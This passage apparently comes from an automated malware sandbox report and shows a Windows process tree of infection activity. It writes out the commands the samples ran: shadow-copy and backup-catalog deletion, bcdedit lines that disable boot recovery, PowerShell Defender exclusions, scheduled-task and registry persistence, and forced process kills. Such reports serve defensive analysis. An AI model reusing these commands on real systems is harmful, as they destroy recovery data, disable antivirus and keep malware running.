                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                            PID:7820
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                              taskkill /im 52D0.exe /f
                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                              • Kills process with taskkill
                                                                                                                                                                                                                                                              PID:8316
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                                              timeout /t 6
                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                              • Delays execution with timeout.exe
                                                                                                                                                                                                                                                              PID:10420
                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\6918.exe
                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\6918.exe
                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                            PID:12116
                                                                                                                                                                                                                                                          • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                                                            C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                            • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                            PID:12144
                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\86F2.exe
                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\86F2.exe
                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                            • Checks BIOS information in registry
                                                                                                                                                                                                                                                            • Checks whether UAC is enabled
                                                                                                                                                                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                            PID:6288
                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\svcli.exe
                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\svcli.exe"
                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                PID:8044
                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                  "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\OLgDLcX" /XML "C:\Users\Admin\AppData\Local\Temp\tmpC793.tmp"
                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                  • Creates scheduled task(s)
                                                                                                                                                                                                                                                                  PID:10512
                                                                                                                                                                                                                                                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                                                                                                                                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                    PID:10544
                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\91D0.exe
                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\91D0.exe
                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                  PID:6156
                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\filename.exe
                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\filename.exe"
                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                      PID:2008
                                                                                                                                                                                                                                                                      • C:\ProgramData\pay.exe
                                                                                                                                                                                                                                                                        "C:\ProgramData\pay.exe"
                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                          PID:8256
                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\services.exe
                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\services.exe" -start
                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                              PID:8428
                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\services.exe
                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\services.exe" -agent 0
                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                  PID:9608
                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                  "C:\Windows\system32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\~temp001.bat
                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                    PID:9596
                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                                                                                                                                                                      wmic shadowcopy delete
                                                                                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                                                                                        PID:5240
                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\vssadmin.exe
                                                                                                                                                                                                                                                                                        vssadmin delete shadows /all /quiet
                                                                                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                                                                                        • Interacts with shadow copies
                                                                                                                                                                                                                                                                                        PID:676
                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                      "C:\Windows\system32\cmd.exe" /C vssadmin delete shadows /all /quiet
                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                        PID:9592
                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\vssadmin.exe
                                                                                                                                                                                                                                                                                          vssadmin delete shadows /all /quiet
                                                                                                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                                                                                                          • Interacts with shadow copies
                                                                                                                                                                                                                                                                                          PID:8756
                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                        "C:\Windows\system32\cmd.exe" /C wbadmin delete catalog -quiet
                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                          PID:9584
                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                          "C:\Windows\system32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures
                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                            PID:9580
                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                            "C:\Windows\system32\cmd.exe" /C bcdedit /set {default} recoveryenabled no
                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                              PID:9564
                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                              "C:\Windows\system32\cmd.exe" /C wmic shadowcopy delete
                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                PID:9568
                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                                                                                                                                                                                  wmic shadowcopy delete
                                                                                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                                                                                    PID:1708
                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\notepad.exe
                                                                                                                                                                                                                                                                                                  notepad.exe
                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                    PID:11648
                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\notepad.exe
                                                                                                                                                                                                                                                                                                  notepad.exe
                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                    PID:8416
                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\ali.exe
                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\ali.exe"
                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                  PID:8180
                                                                                                                                                                                                                                                                                                  • C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                    "C:\Windows\System32\\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\ali.exe"
                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                      PID:7816
                                                                                                                                                                                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                        "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                          PID:8556
                                                                                                                                                                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                            powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                              PID:8604
                                                                                                                                                                                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                              powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                PID:9876
                                                                                                                                                                                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                              "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr "C:\Windows\system32\services32.exe"
                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                PID:9036
                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                                  schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr "C:\Windows\system32\services32.exe"
                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                  • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                  PID:11160
                                                                                                                                                                                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                "cmd" cmd /c "C:\Windows\system32\services32.exe"
                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                  PID:6160
                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\services32.exe
                                                                                                                                                                                                                                                                                                                    C:\Windows\system32\services32.exe
                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                      PID:11120
                                                                                                                                                                                                                                                                                                                      • C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                                        "C:\Windows\System32\\conhost.exe" "C:\Windows\system32\services32.exe"
                                                                                                                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                                                                                                                          PID:10972
                                                                                                                                                                                                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                            "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
                                                                                                                                                                                                                                                                                                                            7⤵
                                                                                                                                                                                                                                                                                                                              PID:12216
                                                                                                                                                                                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
                                                                                                                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                                                                                                                  PID:4176
                                                                                                                                                                                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                  powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
                                                                                                                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                                                                                                                    PID:12072
                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\Microsoft\Telemetry\sihost32.exe
                                                                                                                                                                                                                                                                                                                                  "C:\Windows\system32\Microsoft\Telemetry\sihost32.exe"
                                                                                                                                                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                                                                                                                                                    PID:4628
                                                                                                                                                                                                                                                                                                                                    • C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                                                      "C:\Windows\System32\\conhost.exe" "/sihost32"
                                                                                                                                                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                                                                                                                                                        PID:1088
                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\msiexec.exe
                                                                                                                                                                                                                                                                                                                          C:\Windows\system32\msiexec.exe /V
                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                          • Enumerates connected drives
                                                                                                                                                                                                                                                                                                                          • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                          PID:6652
                                                                                                                                                                                                                                                                                                                          • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                                                                                            C:\Windows\syswow64\MsiExec.exe -Embedding 8ADD5C4D3F15D169A4DC8309FB5BE9F5 C
                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                            PID:7416
                                                                                                                                                                                                                                                                                                                          • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                                                                                            C:\Windows\syswow64\MsiExec.exe -Embedding 0271872EDFBB4610FB59CE58C82DC349 C
                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                            PID:8184
                                                                                                                                                                                                                                                                                                                          • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                                                                                            C:\Windows\syswow64\MsiExec.exe -Embedding 5B648787CC186B5601DF615BB5351A63
                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                            • Blocklisted process makes network request
                                                                                                                                                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                            PID:9708
                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Calculator\Calculator\prerequisites\aipackagechainer.exe
                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Calculator\Calculator\prerequisites\aipackagechainer.exe"
                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                              PID:11756
                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Calculator\Calculator\prerequisites\RequiredApplication_1\Calculator%20Installation.exe
                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Calculator\Calculator\prerequisites\RequiredApplication_1\Calculator%20Installation.exe" -silent=1 -CID=764 -SID=764 -submn=default
                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                  PID:12264
                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--DzBsjyZ8js"
                                                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                                                      PID:7124
                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x1dc,0x1e0,0x1e4,0x1b8,0x1e8,0x7ff882bcdec0,0x7ff882bcded0,0x7ff882bcdee0
                                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                                          PID:9776
                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff6cfec9e70,0x7ff6cfec9e80,0x7ff6cfec9e90
                                                                                                                                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                                                                                                                                              PID:9888
                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1788,12294177995682107437,17114889995655598097,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7124_1315882540" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=2260 /prefetch:1
                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                              PID:3656
                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1788,12294177995682107437,17114889995655598097,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7124_1315882540" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2252 /prefetch:1
                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                PID:10204
                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1788,12294177995682107437,17114889995655598097,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7124_1315882540" --mojo-platform-channel-handle=1888 /prefetch:8
                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                  PID:10212
                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1788,12294177995682107437,17114889995655598097,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7124_1315882540" --mojo-platform-channel-handle=1876 /prefetch:8
                                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                                    PID:10188
                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1788,12294177995682107437,17114889995655598097,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7124_1315882540" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1824 /prefetch:2
                                                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                                                      PID:10172
                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1788,12294177995682107437,17114889995655598097,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7124_1315882540" --mojo-platform-channel-handle=3276 /prefetch:8
                                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                                        PID:7644
                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1788,12294177995682107437,17114889995655598097,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7124_1315882540" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3300 /prefetch:2
                                                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                                                          PID:7036
                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1788,12294177995682107437,17114889995655598097,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7124_1315882540" --mojo-platform-channel-handle=3364 /prefetch:8
                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                            PID:10584
                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1788,12294177995682107437,17114889995655598097,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7124_1315882540" --mojo-platform-channel-handle=2616 /prefetch:8
                                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                                              PID:9916
                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1788,12294177995682107437,17114889995655598097,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7124_1315882540" --mojo-platform-channel-handle=3308 /prefetch:8
                                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                                PID:5660
                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1788,12294177995682107437,17114889995655598097,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7124_1315882540" --mojo-platform-channel-handle=3408 /prefetch:8
                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                  PID:11284
                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -NoLogo -ExecutionPolicy AllSigned -Command "C:\Users\Admin\AppData\Local\Temp\AI_A7B7.ps1 -paths 'C:\Users\Admin\AppData\Roaming\Calculator\Calculator\prerequisites\file_deleter.ps1','C:\Users\Admin\AppData\Roaming\Calculator\Calculator\prerequisites\aipackagechainer.exe','C:\Users\Admin\AppData\Roaming\Calculator\Calculator\prerequisites' -retry_count 10"
                                                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                                                PID:9148
                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\9E06.exe
                                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\9E06.exe
                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                              PID:5672
                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\B885.exe
                                                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\B885.exe
                                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                                PID:7668
                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe
                                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe"
                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                  • Adds Run key to start application
                                                                                                                                                                                                                                                                                                                                                                  PID:8672
                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\603c0340b4\
                                                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                                                      PID:9080
                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                        REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\603c0340b4\
                                                                                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                                                                                          PID:9328
                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN sqtvvs.exe /TR "C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe" /F
                                                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                                                        • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                                                                        PID:9156
                                                                                                                                                                                                                                                                                                                                                                      • C:\ProgramData\1832596513\1832596513.exe
                                                                                                                                                                                                                                                                                                                                                                        "C:\ProgramData\1832596513\1832596513.exe"
                                                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                                                          PID:7560
                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                                                                                                                      rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                                      • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                                                                                      PID:7788
